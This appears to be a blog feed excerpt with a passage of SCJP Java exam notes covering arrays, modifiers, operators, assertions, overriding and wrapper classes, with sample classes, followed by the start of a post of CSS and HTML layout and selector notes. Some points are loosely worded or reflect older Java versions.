<li>For primitives, smaller length values (char, byte and short) can be
placed in an int array</li>
<li>For Objects, its subclass reference variables can be placed in an
Object array</li>
<li>Primitive array variables cannot be assigned array variables of a smaller
primitive type. <code>int[] x = new char[] {6,7,8};</code> <strong>This is not
correct</strong></li>
<li>For Object, array variables CAN be assigned their subclass array
variables (unlike primitive variables)</li>
<li>Refer to Default Values for Primitive and Reference types</li>
<li>Class level String variables will be initialized only to NULL</li>
<li>Local and Class Level Array Variables will be initialized when the
array is INITIALIZED int[] a = new int[5]; This will make all the values
as 0 in the array, irrespective of where it is declared and
initialized</li>
<li>Local Variables (primitive and Object references) should always be
INITIALIZED before use, or compiler error</li>
</ol>
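<p>The array and range rules above can be verified with a small sketch. <code>ArrayNotesDemo</code> and its method names are hypothetical; the checks only use standard JDK behaviour.</p>

```java
class ArrayNotesDemo {
    // The range formula -2^(bits - 1) .. 2^(bits - 1) - 1, checked for byte.
    static boolean byteRangeMatchesFormula() {
        int bits = Byte.SIZE;
        return Byte.MIN_VALUE == -(1 << (bits - 1))
                && Byte.MAX_VALUE == (1 << (bits - 1)) - 1;
    }

    // Primitive array elements get the default value of their type.
    static int defaultIntElement() {
        int[] a = new int[5];
        return a[0];
    }

    // Object array elements default to null.
    static boolean defaultObjectElementIsNull() {
        String[] s = new String[2];
        return s[0] == null;
    }

    // Anonymous array creation takes no size; length is a field, not a method.
    static int anonymousArrayLength() {
        int[] x = new int[] {4, 5};
        return x.length;
    }

    // A negative index compiles but fails at runtime.
    static boolean negativeIndexThrows() {
        int[] a = new int[3];
        int index = -1;
        try {
            a[index] = 1;
            return false;
        } catch (ArrayIndexOutOfBoundsException expected) {
            return true;
        }
    }

    // byte, short and char values are widened when stored in an int array.
    static int smallerPrimitivesFit() {
        byte b = 1;
        short s = 2;
        char c = 'A';
        int[] a = {b, s, c};
        return a[0] + a[1] + a[2];
    }

    // A String[] can be assigned to an Object[] variable.
    static int subclassArrayAssignable() {
        Object[] objects = new String[] {"a", "b"};
        return objects.length;
    }

    public static void main(String[] args) {
        System.out.println(byteRangeMatchesFormula());
        System.out.println(smallerPrimitivesFit());
        System.out.println(negativeIndexThrows());
    }
}
```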
<h3 id="chapter-2">Chapter 2</h3>
<ol type="1">
<li><code>strictfp</code> is only for class and a method and NEVER for a
variable. It can be combined with either final or abstract.</li>
<li>If a method is ending with a semicolon then that class and the
method should be marked abstract (Not needed for interface).</li>
<li>A class can be marked only public or default access. (Not even
Protected is allowed)</li>
<li>If a class has default access, it can be accessed only within the
package level (not even above or sub-packages). Not even importing will
work.</li>
<li>abstract and final cannot be used on the class at the same time.
This will give a compilation error</li>
<li>When a subclass is created, then the methods from the superclass can
be accessed by the subclass object or by using this operator (in the
subclass methods)</li>
<li>Watch out for public static void main accessing the member variables
and methods without an Object reference. (Static method cannot access
non-static variables)</li>
<li>Private methods CANNOT be overriden. Even if they have the same name
and signature, technically it is NOT overriding</li>
<li><code>default</code> method can be accessed only if the class
accessing belongs to the same package PACKAGE Restriction</li>
<li>Protected method can be accessed through inheritance though the
subclass is from a different package - <strong>Package +
kids</strong></li>
<li>When a subclass outside the package inherits the protected member
(inheritance), the member becomes private to any code outside the
class</li>
<li>Refer to Access to class Members lesson.</li>
<li>The first CONCRETE subclass of an abstract class must implement all
abstract methods of the superclasses.
<code>public void setSpeed(int speed) { speed=speed;}</code> - This will
just assign the local variable speed to itself. We need to write it as this.speed
(NO compilation error)</li>
<li>Any variables declared as final has to be initialized either in the
declaration itself or in the constructor else Compilation error occurs
(If it is not marked final, instance variables need not be initialized).
Also it cannot be overriden by sub class constructors.</li>
<li>STATIC methods cannot be overriden</li>
<li>abstract methods cannot be declared PRIVATE (compilation error),
SYNCHRONIZED, strictfp, native or STATIC. The synchronized and native
modifiers can be set only on Methods, not on variables or
classes; strictfp can be set on classes and methods</li>
<li>Only instance variables can be marked transient and volatile (not
methods or classes)</li>
<li>Instance variables can be marked with any of the four access levels, final,
transient and volatile</li>
<li>Instance variables cannot be marked abstract, synchronized, native
and strictfp</li>
<li>Refer to Comparison of modifiers for variables and methods</li>
<li>Local variables don’t get default values and should be initialized
before use</li>
<li>Instance variables marked <code>final</code> should be initialized
in declaration itself or in the CONSTRUCTOR itself - (Compilation
error)</li>
<li>INTERFACE variables are always public static final. So cannot be
reassigned</li>
<li>Refer to things that can be static and non-static</li>
<li>Explicit imports are resolved first, then the classes from the
current package and last- the implicit imports</li>
<li>for <code>java.lang.Runnable</code> interface question, only one
method available is public void run(){}</li>
<li>Refer to Interface Properties</li>
<li>A variable declared in the interface cannot be changed at all</li>
<li>A concrete implementation of an interface need not declare the
throws clause of the abstract method; however, it cannot add any new checked exceptions,
only the exceptions declared in the abstract method
or their subclasses</li>
<li>Only INTERFACEs can extend more than one interface, but an interface CANNOT
implement anything or extend a class</li>
<li>Synchronized can be applied to static and final methods</li>
<li>When a class with protected method is created, the method can be
accessed ONLY by the subclass ‘this’ or subclass objects WITHIN the
class (Super class objects give compilation error).</li>
<li>Outside the subclass, the method cannot be accessed using
objects</li>
</ol>
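<p>Three of the points above lend themselves to a quick check: the shadowed setter parameter, static methods being hidden rather than overridden, and interface variables being constants. The sketch below uses hypothetical names (<code>Car</code>, <code>Limits</code>, <code>Parent</code>, <code>Child</code>) purely for illustration.</p>

```java
class ModifierNotesDemo {
    // Interface variables are implicitly public static final.
    interface Limits {
        int MAX_SPEED = 120;
    }

    static class Car {
        private int speed;

        // The parameter shadows the field: this assigns the parameter to itself.
        void setSpeedShadowed(int speed) {
            speed = speed;
        }

        // this.speed refers to the instance variable.
        void setSpeed(int speed) {
            this.speed = speed;
        }

        int getSpeed() {
            return speed;
        }
    }

    static class Parent {
        static String kind() { return "parent"; }
        String name() { return "parent"; }
    }

    static class Child extends Parent {
        // Hides Parent.kind(); static methods are not overridden.
        static String kind() { return "child"; }

        @Override
        String name() { return "child"; }
    }

    static int speedAfterShadowedSetter() {
        Car car = new Car();
        car.setSpeedShadowed(50);
        return car.getSpeed();
    }

    static int speedAfterCorrectSetter() {
        Car car = new Car();
        car.setSpeed(50);
        return car.getSpeed();
    }

    // The static call is resolved from the reference type (Parent).
    static String staticThroughParentReference() {
        Parent p = new Child();
        return p.kind();
    }

    // The instance call is resolved from the object type (Child).
    static String instanceThroughParentReference() {
        Parent p = new Child();
        return p.name();
    }

    public static void main(String[] args) {
        System.out.println(speedAfterShadowedSetter());
        System.out.println(staticThroughParentReference());
        System.out.println(Limits.MAX_SPEED);
    }
}
```

<p>Assigning to <code>Limits.MAX_SPEED</code> anywhere would be a compilation error, since the variable is final.</p>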
<h3 id="chapter-3">Chapter 3</h3>
<ol type="1">
<li>Compound operators (+=) have an implicit cast</li>
<li>For divide by zero, integers will give ArithmeticException at
runtime, while floating point numbers return positive or negative
infinity. The remainder operator behaves the same way for integers, but gives NaN for floating point numbers</li>
<li>String concatenation in a <code>System.out.println</code> works from left to right. If the left and right operands
are both numbers then <code>+</code> adds them; if either one of them is a String
then the result is a String</li>
<li>Watch out for increment/decrement operators on a FINAL variable</li>
<li>For <code>&gt;&gt;</code> (right shift), the sign bit gets copied
over. Hence the sign remains the same (-ve number remains negative). For
<code>&lt;&lt;</code> (left shift) the right side is ALWAYS FILLED with
zeroes</li>
<li><code>&gt;&gt;&gt;</code> (UNSIGNED Right Shift) always fills the
left side with zeroes irrespective of the sign bit. Hence a shift by at least one bit
always gives a non-negative number</li>
<li>When the shift number is greater than the bit length, then the
remainder is used for shifting. Ex:
<code>int x = 2; x &gt;&gt;= 34</code>. This actually means
<code>x &gt;&gt;= 2</code> where <code>34%32 = 2</code></li>
<li>Right Shift divides the number by
<code>2^bits</code> (Ex: <code>x &gt;&gt; 3</code> means <code>x/2^3</code>)</li>
<li>Left Shift multiplies the number by
<code>2^bits</code> (Ex: <code>x &lt;&lt; 3</code> means <code>x * 2^3</code>)</li>
<li><code>&amp; - Logical AND; | - Logical OR; ^ - Exclusive OR; ~ - Bitwise complement</code></li>
<li>Refer to Values of the Truth table</li>
<li>SHORT CIRCUIT Operators work only with Boolean Expressions and NOT
with numbers.</li>
<li>However, the logical AND and OR can work with both shadowing
Primitives and Object references</li>
<li>Watch out for EXOR (<code>^</code>) being mistaken for power of (Always use
<code>Math.pow()</code>)</li>
<li>Always <code>&</code> takes precedence over <code>|</code> . So
<code>&</code> is evaluated first, in a boolean expression</li>
<li>Whenever any action happens on a String Object, a new String object
is created as the result</li>
</ol>
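<p>The operator rules in this chapter can be checked with a short sketch. The class and method names are hypothetical; the values in the shift example are chosen here so that the result is non-zero.</p>

```java
class OperatorNotesDemo {
    // Compound assignment carries an implicit cast; b = b + 5 would not compile.
    static byte compoundAssignment() {
        byte b = 10;
        b += 5;
        return b;
    }

    // Integer division by zero throws at runtime.
    static boolean intDivideByZeroThrows() {
        int zero = 0;
        try {
            int unused = 5 / zero;
            return false;
        } catch (ArithmeticException expected) {
            return true;
        }
    }

    // Floating-point division by zero yields infinity instead.
    static double doubleDivideByZero() {
        return 5.0 / 0;
    }

    // Floating-point remainder by zero yields NaN.
    static boolean doubleRemainderByZeroIsNaN() {
        return Double.isNaN(5.0 % 0);
    }

    // For an int, a shift distance of 34 is reduced to 34 % 32 == 2.
    static int shiftDistanceWraps() {
        int x = 64;
        x >>= 34;
        return x;
    }

    // ^ is exclusive OR, not exponentiation.
    static int xorIsNotPower() {
        return 2 ^ 3;
    }

    static double power() {
        return Math.pow(2, 3);
    }

    // + is evaluated left to right: numbers add until a String appears.
    static String concatenationLeftToRight() {
        return 1 + 2 + "3" + 4 + 5;
    }

    public static void main(String[] args) {
        System.out.println(compoundAssignment());
        System.out.println(shiftDistanceWraps());
        System.out.println(concatenationLeftToRight());
    }
}
```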
<h3 id="chapter-4">Chapter 4</h3>
<ol type="1">
<li>The else will always belong to the innermost if which doesn’t have
an else</li>
<li>The arguments to switch statement can only be byte,short,char and
int</li>
<li>The switch can check only for equality and the case arguments must
be determined at compile time. So they have to be either literal constants or
final variables</li>
<li>If switch(byte variable) is used, then if the case value is greater
than 127 then COMPILATION error occurs</li>
<li>In switch case, two case literals cannot have the same value</li>
<li><code>default</code> can be placed anywhere in switch case and it
will also follow the rule of fall-through</li>
<li>The scope of the variables declared in the for loop is within the
for-loop.</li>
<li>In a For Loop, Initialization is performed and CONDITION is checked
before the first execution</li>
<li>Iteration will run after every execution and then only comes out of
the loop. However, if break, System.exit or return is given inside the
for-loop the iteration is NOT executed</li>
<li><code>continue</code> should be within a loop while break should be
within a loop or switch statement</li>
<li>A try clause Should always have either catch or finally block which
should immediately follow the try clause without any statements in
between</li>
<li>If the subclass is placed after the superclass in the exception
catch, COMPILATION Error occurs</li>
<li>Any method “ducking” the exception should also declare the throws
clause, except for RuntimeExceptions</li>
<li>Error or subclass of Error are always unchecked. So it is not
required to catch them</li>
<li>For re-throwing the exceptions also(commonly from a catch block), we
need to declare the exceptions</li>
<li>Assertion is always tested for true condition, if the condition
returns false, AssertionError is thrown</li>
<li><code>Ex: assert (x &lt; y) : "Error statement " + y</code>. The First
Expression should always result in a boolean while the second expression
should always result in a value (just like sysout); it cannot be a call to
a void method</li>
<li>Refer to Legal and Illegal assert Expressions</li>
<li>assertions are disabled by default. So we can use assert as an
identifier. But if we turn on assertions, then assert is a keyword -
<code>Turn On: javac -source 1.4 test.ClassName</code></li>
<li>To Compile without assertions (default)
<code>javac -source 1.3 test.ClassName</code></li>
<li>Enabling assertions while executing :
<code>java (-ea or -enableassertions) test.ClassName</code></li>
<li>Disabling assertions while executing :
<code>java (-da or -disableassertions) test.ClassName</code></li>
<li>The above enabling or disabling can be given without any class or
package name for all classes or only at package or class level.
<code>java -ea -da:test.ClassName</code> enables for all except
test.ClassName (same for package as well)</li>
<li>Refer to Assertion Command Line switches</li>
<li>AssertionError can be caught but it is not
appropriate (not recommended); the AssertionError object is not
accessible</li>
<li>Assertion recommendations:</li>
</ol>
<ul>
<li>Do not use assertions to validate arguments to a public method
(needs to be checked mandatorily)</li>
<li>Do use assertions to validate arguments to a private method</li>
<li>Do not use assertions to validate command-line arguments</li>
<li>Do use assertions, even in public methods, to check for cases that
you know are never, ever supposed to happen (default of a switch Ex:
default: <code>assert false;</code>)</li>
<li>Do not use assert expressions that can cause side effects (method
calls or value changing ones)</li>
<li>Do not use assertions in private getters and setters</li>
</ul>
<ol start="27" type="1">
<li>If a variable is marked FINAL, always check for any code that
changes the value</li>
<li>The VM evaluates all assertion flags from left to right</li>
</ol>
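<p>The flow-control rules in this chapter (dangling else, switch fall-through with <code>default</code> in the middle, and the for-loop iteration being skipped on <code>break</code>) can be sketched as below. <code>FlowControlDemo</code> and its method names are hypothetical.</p>

```java
class FlowControlDemo {
    // The else binds to the innermost if, whatever the indentation suggests.
    static String danglingElse(int x) {
        String result = "none";
        if (x > 0)
            if (x > 10) result = "big";
        else result = "small positive";
        return result;
    }

    // default may appear anywhere and takes part in fall-through.
    static String fallThrough(int value) {
        StringBuilder out = new StringBuilder();
        final int two = 2; // compile-time constant, so legal as a case label
        switch (value) {
            case 1:
                out.append("one ");
            default:
                out.append("default ");
            case two:
                out.append("two ");
                break;
            case 3:
                out.append("three ");
        }
        return out.toString().trim();
    }

    // break leaves the loop before the iteration expression (i++) runs.
    static int iterationSkippedOnBreak() {
        int i;
        for (i = 0; i < 5; i++) {
            if (i == 2) {
                break;
            }
        }
        return i;
    }

    public static void main(String[] args) {
        System.out.println(danglingElse(5));
        System.out.println(fallThrough(1));
        System.out.println(fallThrough(9));
        System.out.println(iterationSkippedOnBreak());
    }
}
```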
<h3 id="chapter-5">Chapter 5</h3>
<ol type="1">
<li>getters - Accessors and setters - mutators</li>
<li>When the instance variables are public, watch for questions about
whether the values will always be as those set in the setters</li>
<li>IS-A means extends (subclass). IS-A, extends, derived from,
Inherited from, instance of, subtype of all means subclassing</li>
<li>HAS-A means having a reference variable of type</li>
<li><code>Animal a = new Horse();</code> a can access methods which are
ONLY overridden by the Horse Object and CANNOT access methods which are
present only in the Horse Class. However, it can access all methods of
Animal, though they are not present in the Horse</li>
<li><code>Animal a = new Horse(); a.eat()</code> will call the HORSE
object eat as the object type is decided by virtual method invocation
for OVERRIDING methods</li>
<li>Rules for Overriding:</li>
</ol>
<ul>
<li>Argument list and type, return type should match</li>
<li>Access levels can be less restrictive but CANNOT be more
restrictive</li>
<li>There cannot be new or broader checked exceptions thrown, however they can
be fewer or narrower (subclass can be thrown)</li>
</ul>
<ol start="8" type="1">
<li>Overload can change the return type, however changing ONLY the
return type is not a valid overload</li>
<li>Overload can change the argument list, return type, access modifier,
can give broader and new exceptions, overloaded in the same or
subclass</li>
<li>The REFERENCE Type decides which overloaded method is being
called.</li>
</ol>
<ul>
<li>Overriding - Instance Type (Runtime)</li>
<li>Overloading - reference Type (Compile Time)</li>
</ul>
<ol start="11" type="1">
<li>Refer to Overloaded and Overriden Method Invocations</li>
<li>Refer to Difference between Overloaded and Overriden methods</li>
<li>Watch out for methods with the same name as the class but with a return type.
They are not constructors</li>
<li>If a constructor with arguments is created, a no-arg constructor
will NOT be created by default</li>
<li>Abstract classes can have Constructors and are always called when
the subclass is instantiated. Interfaces DO NOT have constructors</li>
<li>A constructor can be called only by another constructor using
super() or this(), it cannot be called by any other method</li>
<li>A default constructor has the same access modifier as the class, a
super() call in the first line and is of no-arg type</li>
<li>If the super class does not have a no-arg constructor, we HAVE to
provide the super() call correctly (Compilation Error)</li>
<li>A constructor cannot be overriden but can be overloaded, but only
within the same class as it is NOT inherited</li>
<li>A constructor can have only one call to super() or this(), never both, and it
should be there in the first line</li>
<li>For return values, it can be a value which can be IMPLICITLY cast
into the return type (short for an int return type) and a sub class type
can be returned for a super class return type</li>
</ol>
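<p>The overriding, overloading and constructor-chaining rules above can be illustrated with a short sketch. <code>Animal</code> and <code>Horse</code> follow the names in the notes; <code>DispatchDemo</code>, <code>feed</code>, <code>Base</code> and <code>Derived</code> are hypothetical additions.</p>

```java
class DispatchDemo {
    static class Animal {
        String eat() { return "animal eats"; }
    }

    static class Horse extends Animal {
        @Override
        String eat() { return "horse eats"; }

        // Overload that exists only on Horse.
        String eat(String food) { return "horse eats " + food; }
    }

    static String feed(Animal a) { return "feed(Animal)"; }
    static String feed(Horse h) { return "feed(Horse)"; }

    // Overriding: the object type (Horse) decides at runtime.
    static String overriddenCall() {
        Animal a = new Horse();
        return a.eat();
    }

    // Overloading: the reference type (Animal) decides at compile time.
    static String overloadedCall() {
        Animal a = new Horse();
        return feed(a);
    }

    // a.eat("carrots") would not compile; the cast makes the overload visible.
    static String callAfterCast() {
        Animal a = new Horse();
        return ((Horse) a).eat("carrots");
    }

    // Abstract classes have constructors, run when a subclass is created.
    static abstract class Base {
        final StringBuilder log = new StringBuilder();

        Base() { log.append("Base "); }
    }

    static class Derived extends Base {
        Derived() {
            this("x"); // must be the first statement
            log.append("Derived()");
        }

        Derived(String s) {
            super(); // must be the first statement
            log.append("Derived(String) ");
        }
    }

    static String constructorOrder() {
        return new Derived().log.toString();
    }

    public static void main(String[] args) {
        System.out.println(overriddenCall());
        System.out.println(overloadedCall());
        System.out.println(callAfterCast());
        System.out.println(constructorOrder());
    }
}
```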
<h3 id="chapter-6">Chapter 6</h3>
<ol type="1">
<li>Refer to String Object Creation count</li>
<li><code>String.charAt(index)</code> is zero based</li>
<li>Arrays has an ATTRIBUTE length while String has a method
length()</li>
<li><code>String.substring</code> (the String word in the method is in
lowercase) has (start,end). Start is zero-indexed and End is
1-indexed</li>
<li>StringBuffer are ideal for file I/O for handling large streams of
data</li>
<li>StringBuffer methods are Synchronized</li>
<li><code>StringBuffer.insert(offset,String)</code>. Offset is
Zero-indexed</li>
<li><code>abs</code> method has all four numerical types as
arguments</li>
<li><code>ceil</code> and <code>floor</code> takes only a double and
returns a double</li>
<li><code>max</code> and <code>min</code> takes all four types of
arguments but arg1 and arg2 should be of the same type. However for
arguments, they are implicitly CAST. Eg: <code>Math.max(23.5, 3)</code>
or <code>Math.max(a,b)</code> where a is int and b is float</li>
<li><code>random</code> generates a number x in the range 0.0 &lt;= x &lt;
1.0</li>
<li><code>round</code> takes a float or double and returns a int or
long</li>
<li>sin,cos, tan and SQRT takes only double (radians) and returns a
double</li>
<li><code>toDegrees</code> and <code>toRadians</code> take and return a
double</li>
<li>Refer to Important static Math methods</li>
<li>Wrapper classes Float and Double has POSITIVE_INFINITY and
NEGATIVE_INFINITY</li>
<li><code>Double.isNaN(x)</code> is used for testing whether a number is NaN</li>
<li><code>Math.sqrt(-16d)</code> results in NaN</li>
<li>divide by 0 for floating point number works while for integers gives
ArithmeticException</li>
<li>Refer to Wrapper Class Constructor Arguments</li>
<li><code>valueOf</code> is present for Integer, Long, Byte and Short and
is used as <code>Integer.valueOf("1001101", 2) => 77</code>. i.e.,
takes two arguments String and radix and returns a WRAPPER class</li>
<li><code>intValue</code> and <code>parseInt</code> returns a primitive
number</li>
<li>Refer to Wrapper Conversion Methods (Important)</li>
<li>The 3 types of toString usages are:</li>
</ol>
<ul>
<li><code>obj.toString()</code>;</li>
<li><code>Double.toString(3.3d)</code> (All wrapper class has this
except Boolean and Character)</li>
<li><code>Long.toString(254,16)</code> => fe (Integer and Long)</li>
</ul>
<ol start="25" type="1">
<li>Integer and Long has these methods also.</li>
</ol>
<ul>
<li>Integer.toBinaryString(), toHexString() and toOctalString()</li>
</ul>
<ol start="26" type="1">
<li>Watch out for usage of StringBuffer methods like append(), reverse()
on String Objects which leads to Compilation Error</li>
</ol>
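<p>A minimal sketch of the String, Math and wrapper methods listed in this chapter. <code>WrapperNotesDemo</code> and its method names are hypothetical; every call used is a standard JDK method.</p>

```java
class WrapperNotesDemo {
    // valueOf(String, radix) returns a wrapper object.
    static Integer parseBinary() {
        return Integer.valueOf("101011", 2);
    }

    // parseInt returns a primitive.
    static int parsePrimitive() {
        return Integer.parseInt("43");
    }

    // Long.toString(value, radix) renders the value in the given base.
    static String hexString() {
        return Long.toString(254, 16);
    }

    static String binaryString() {
        return Integer.toBinaryString(5);
    }

    // substring(start, end): start is inclusive, end is exclusive.
    static String substringExample() {
        return "abcdef".substring(1, 3);
    }

    // insert uses a zero-based offset.
    static String insertExample() {
        return new StringBuffer("0123").insert(2, "--").toString();
    }

    // The square root of a negative number is NaN, tested with isNaN.
    static boolean sqrtOfNegativeIsNaN() {
        return Double.isNaN(Math.sqrt(-16d));
    }

    // round(double) returns a long; ceil takes and returns a double.
    static long roundExample() {
        return Math.round(2.5);
    }

    static double ceilExample() {
        return Math.ceil(2.1);
    }

    public static void main(String[] args) {
        System.out.println(parseBinary());
        System.out.println(hexString());
        System.out.println(substringExample());
        System.out.println(insertExample());
    }
}
```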
<p>Continued in <a href="aceing-scjp-notes-from-kathy-sierra-prep-book-part-2">Part
2</a></p>Learning basics of CSS and quick notes2008-09-03T00:00:00-07:002008-09-03T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2008-09-03:/posts/learning-basics-of-css-and-quick-notes.htmlThe following are some of the important points that i had gathered during my learning of CSS and HTML markup. It also contains the important factors to consider when converting a given PSD or image into a good HTML markup and CSS.<p>The following are some of the important points that i had gathered
during my learning of CSS and HTML markup. It also contains the
important factors to consider when converting a given PSD or image into
a good HTML markup and CSS.</p>
<h3 id="slicing-techniques">Slicing techniques</h3>
<ol type="1">
<li>Do not slice the logo</li>
<li>Figure out the gradient for repeating along the x-axis</li>
<li>Don't start with the slice tool from the toolbar</li>
<li>Always design with a wrapper div - for a row or a column - to be
enclosed as a container tag</li>
<li>Decide upon only one type of slicing for a given layout - for the
wrapper divs and then perform the slicing</li>
<li>First horizontal - because the flow goes from right to left</li>
<li>After selecting the slice, divide the slice and give the number of
dividers you would need</li>
<li>Save for Web and Devices - Gif and PNG for transparent ones</li>
<li>Quality generally set up as 75-85%</li>
</ol>
<h3 id="remember">Remember</h3>
<ol type="1">
<li>height, width, padding, margin, float - the most important
properties</li>
<li>use the following (or use a reset)</li>
</ol>
<div class="sourceCode" id="cb1"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a>body{</span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a> <span class="kw">padding</span><span class="ch">:</span><span class="dv">0</span><span class="op">;</span></span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a> <span class="kw">margin</span><span class="ch">:</span><span class="dv">0</span><span class="op">;</span></span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a>}</span></code></pre></div>
<ol start="3" type="1">
<li>Give Wrapper <code>margin:auto;</code> to make the whole container
centered</li>
<li>Give fixed width and height to get the margin auto to work
properly</li>
<li>Div dimensions: width + margin + padding + border</li>
<li>Whenever you add padding or margin, adjust the width or
height accordingly</li>
<li>Use <code>margin:auto;</code> to center the div within the
container</li>
<li><code>#nav ul{ margin:0; padding:0;}</code> - remember this for every UL
block, or use a reset</li>
<li>Always use <code>ul{list-style-type: none;}</code></li>
<li>Give <code>li{display:block}</code> and provide width & height
to get a BUTTON look and feel</li>
<li>For vertical nav bar, when absolute position is used, use negative
margin-left and margin-top of size half of the width and height of the
div.</li>
<li>Always decide the target browsers and supported resolutions up
front</li>
</ol>
<h3 id="media-queries">Media Queries</h3>
<ol type="1">
<li>Switch floated elements back to normal flow by overriding the
height/width/float properties as the screen size changes</li>
<li>Always use <code>margin:0; padding:0;</code> - for reset</li>
<li>Types of layouts - pure fluid / pure display oriented / hybrid
<ul>
<li>Fluid layout: a system of relative layout instead of absolute pixels;
height/width only in percentages</li>
<li>Adaptive layout: uses <code>@media</code> rules</li>
<li>Responsive layout: a mix of fluid and adaptive layouts (percentages
plus <code>@media</code> rules)</li>
</ul>
</li>
</ol>
<ol start="4" type="1">
<li>New way of setting the viewport, using a meta tag</li>
</ol>
<pre><code> <meta name="viewport" content="initial-scale=1,width=device-width"></code></pre>
<ol start="5" type="1">
<li>Media query representation</li>
</ol>
<div class="sourceCode" id="cb3"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb3-1"><a aria-hidden="true" href="#cb3-1" tabindex="-1"></a> <span class="im">@media</span> <span class="an">screen</span> <span class="kw">and</span> <span class="fu">(</span><span class="kw">max-width</span><span class="ch">:</span> <span class="dv">980</span><span class="dt">px</span><span class="fu">)</span>{</span>
<span id="cb3-2"><a aria-hidden="true" href="#cb3-2" tabindex="-1"></a> ....</span>
<span id="cb3-3"><a aria-hidden="true" href="#cb3-3" tabindex="-1"></a> }</span></code></pre></div>
<ol start="6" type="1">
<li>Always design for the smallest resolution first</li>
<li>Try to use different images with different srcs to cater to
different sizes</li>
</ol>
<h3 id="types-of-selectors">Types of Selectors</h3>
<ol type="1">
<li>Tag</li>
<li>Class</li>
<li>Pseudo-element <code>[first-line, first-letter]</code> <em>This
is the LEAST important selector</em></li>
<li>Contextual/Conditional - selective styling -
<code>p strong{}</code></li>
<li>Group/Compound selector - more than 1 tag</li>
<li>Pseudo-class <code>[link,active,hover,visited]</code> - <em>MORE
important than the other pseudo-element</em></li>
<li>ID Selector</li>
<li>When to use id vs class?
<ul>
<li>Use class references, which carry less weight</li>
<li>Use the tag selectors first</li>
</ul>
</li>
</ol>
<h3 id="selectors-precedence">Selectors Precedence</h3>
<ol type="1">
<li>The precedence for any style flows as :
<code>inline > Embedded > External</code></li>
<li>The precedence for any selector: id > class > tag</li>
<li>For more details, refer to</li>
</ol>
<ul>
<li><a href="http://www.w3.org/TR/CSS21/cascade.html#specificity">Specificity</a></li>
<li><a href="http://www.w3.org/TR/CSS2/selector.html">Selector</a></li>
<li><a href="http://css-tricks.com/specifics-on-css-specificity/">CSS Tricks</a></li>
</ul>
<h3 id="hierarchy-of-precedence">Hierarchy of precedence</h3>
<ol type="1">
<li>The ID selector</li>
<li>The attribute selector</li>
<li>The class selector</li>
<li>The child selector</li>
<li>The adjacent sibling selector - <code>.blog-img + p</code></li>
<li>The descendant selector</li>
<li>The tag selector</li>
</ol>
<h3 id="shorthand-syntax">Shorthand syntax</h3>
<h6 id="background">background</h6>
<div class="sourceCode" id="cb4"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb4-1"><a aria-hidden="true" href="#cb4-1" tabindex="-1"></a> background-image<span class="in">:</span> url<span class="in">(</span>example<span class="fu">.gif</span><span class="in">)</span>;</span>
<span id="cb4-2"><a aria-hidden="true" href="#cb4-2" tabindex="-1"></a> background-color<span class="in">:</span> <span class="pp">#eaeaea</span> ;</span>
<span id="cb4-3"><a aria-hidden="true" href="#cb4-3" tabindex="-1"></a> background-repeat<span class="in">:</span> repeat-x;</span>
<span id="cb4-4"><a aria-hidden="true" href="#cb4-4" tabindex="-1"></a> background-position<span class="in">:</span> top left;</span></code></pre></div>
<p>can be written as:</p>
<div class="sourceCode" id="cb5"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb5-1"><a aria-hidden="true" href="#cb5-1" tabindex="-1"></a>background<span class="in">:</span> <span class="pp">#eaeaea</span> url<span class="in">(</span>example<span class="fu">.gif</span><span class="in">)</span> repeat-x top left;</span></code></pre></div>
<h6 id="border">border</h6>
<div class="sourceCode" id="cb6"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb6-1"><a aria-hidden="true" href="#cb6-1" tabindex="-1"></a> border-color<span class="in">:</span> red;</span>
<span id="cb6-2"><a aria-hidden="true" href="#cb6-2" tabindex="-1"></a> border-width<span class="in">:</span> 1px;</span>
<span id="cb6-3"><a aria-hidden="true" href="#cb6-3" tabindex="-1"></a> border-style<span class="in">:</span> solid;</span></code></pre></div>
<p>can be written as:</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb7-1"><a aria-hidden="true" href="#cb7-1" tabindex="-1"></a>border<span class="in">:</span> 1px solid red;</span></code></pre></div>
<h6 id="list">list</h6>
<div class="sourceCode" id="cb8"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb8-1"><a aria-hidden="true" href="#cb8-1" tabindex="-1"></a> list-style-position<span class="in">:</span> outside;</span>
<span id="cb8-2"><a aria-hidden="true" href="#cb8-2" tabindex="-1"></a> list-style-image<span class="in">:</span> none;</span>
<span id="cb8-3"><a aria-hidden="true" href="#cb8-3" tabindex="-1"></a> list-style-type<span class="in">:</span> disc;</span></code></pre></div>
<p>can be written as:</p>
<div class="sourceCode" id="cb9"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb9-1"><a aria-hidden="true" href="#cb9-1" tabindex="-1"></a>list-style<span class="in">:</span> disc outside;</span></code></pre></div>
<p>the general format for a list style is:</p>
<div class="sourceCode" id="cb10"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb10-1"><a aria-hidden="true" href="#cb10-1" tabindex="-1"></a>list-style<span class="in">:</span> <span class="ex">[</span><span class="ss">list-style-type</span><span class="ex">]</span> <span class="ex">[</span><span class="ss">list-style-position</span><span class="ex">]</span> <span class="ex">[</span><span class="ss">list-style-image</span><span class="ex">]</span>;</span></code></pre></div>
<h6 id="font">font</h6>
<div class="sourceCode" id="cb11"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb11-1"><a aria-hidden="true" href="#cb11-1" tabindex="-1"></a> font-family<span class="in">:</span> Arial<span class="op">,</span> Helvetica;</span>
<span id="cb11-2"><a aria-hidden="true" href="#cb11-2" tabindex="-1"></a> font-weight<span class="in">:</span> bold;</span>
<span id="cb11-3"><a aria-hidden="true" href="#cb11-3" tabindex="-1"></a> font-style<span class="in">:</span> italic;</span>
<span id="cb11-4"><a aria-hidden="true" href="#cb11-4" tabindex="-1"></a> font-size<span class="in">:</span> 1em;</span>
